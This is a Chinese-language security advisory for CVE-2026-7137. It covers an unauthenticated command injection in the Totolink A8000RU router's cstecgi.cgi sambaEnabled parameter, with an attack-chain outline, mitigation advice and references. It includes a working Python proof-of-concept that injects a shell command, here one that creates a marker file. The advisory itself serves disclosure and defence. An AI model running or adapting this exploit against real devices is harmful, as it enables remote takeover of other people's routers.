CVE-2026-7137 CVSS 9.8 严重

CVE-2026-7137 Totolink A8000RU OS命令注入漏洞

披露日期: 2026-04-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7137

漏洞类型

命令注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Totolink A8000RU

漏洞概述

Totolink A8000RU路由器7.1cu.643_b20200521版本存在严重的命令注入漏洞。由于/cgi-bin/cstecgi.cgi中setStorageCfg函数对输入参数过滤不严，未经身份验证的远程攻击者可利用sambaEnabled参数注入恶意操作系统命令，获取系统最高权限。

技术细节

该漏洞的根本原因在于Totolink A8000RU路由器固件中CGI接口对用户输入参数缺乏严格的校验机制。具体而言，/cgi-bin/cstecgi.cgi脚本在处理setStorageCfg请求时，直接将用户提交的sambaEnabled参数值拼接进系统命令字符串中调用底层执行函数。由于未对输入中的特殊字符（如分号、反引号、管道符等）进行转义或过滤，攻击者可以构造恶意的HTTP POST数据包。通过在参数中插入特定的Shell命令，攻击者能够欺骗操作系统执行任意指令。鉴于该漏洞无需身份验证且利用难度低，攻击者可轻易获取Root权限，完全控制受影响设备。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别出暴露的Totolink A8000RU设备及其Web管理接口。

STEP 2

2. 漏洞利用

攻击者向/cgi-bin/cstecgi.cgi发送特制的POST请求，在sambaEnabled参数中注入恶意Shell命令。

STEP 3

3. 命令执行

服务器端CGI程序处理请求时，将恶意参数拼接到系统命令中并执行，导致攻击者代码运行。

STEP 4

4. 后渗透操作

攻击者利用获取的Shell权限下载后门、修改配置或窃取数据，完全控制设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    url = f"http://{target_ip}/cgi-bin/cstecgi.cgi"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    # Payload injects a command to create a file as proof of execution
    # '; touch /tmp/pwned' is the injected command
    payload = {
        "action": "setStorageCfg",
        "sambaEnabled": "; touch /tmp/pwned"
    }
    
    try:
        response = requests.post(url, headers=headers, data=payload, timeout=5)
        if response.status_code == 200:
            print(f"[+] Payload sent to {target_ip}")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Failed to send payload. Status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with actual target IP
    exploit(target)

影响范围

Totolink A8000RU 7.1cu.643_b20200521

防御指南

临时缓解措施

建议用户立即检查设备型号并联系厂商获取安全更新。在升级前，应通过访问控制列表（ACL）限制路由器管理后台仅允许可信内网IP访问，或者彻底关闭WAN侧的远程Web管理功能，以降低被远程攻击的风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7137
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7137
3 Details https://www.cvedetails.com/cve/CVE-2026-7137/
4 VulDB https://vuldb.com/cve/CVE-2026-7137
5 Link https://github.com/Litengzheng/vuldb_new2/blob/main/A8000RU/vul_312/README.md
6 Link https://vuldb.com/submit/801008
7 Link https://vuldb.com/vuln/359736
8 Link https://vuldb.com/vuln/359736/cti
9 Link https://www.totolink.net/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表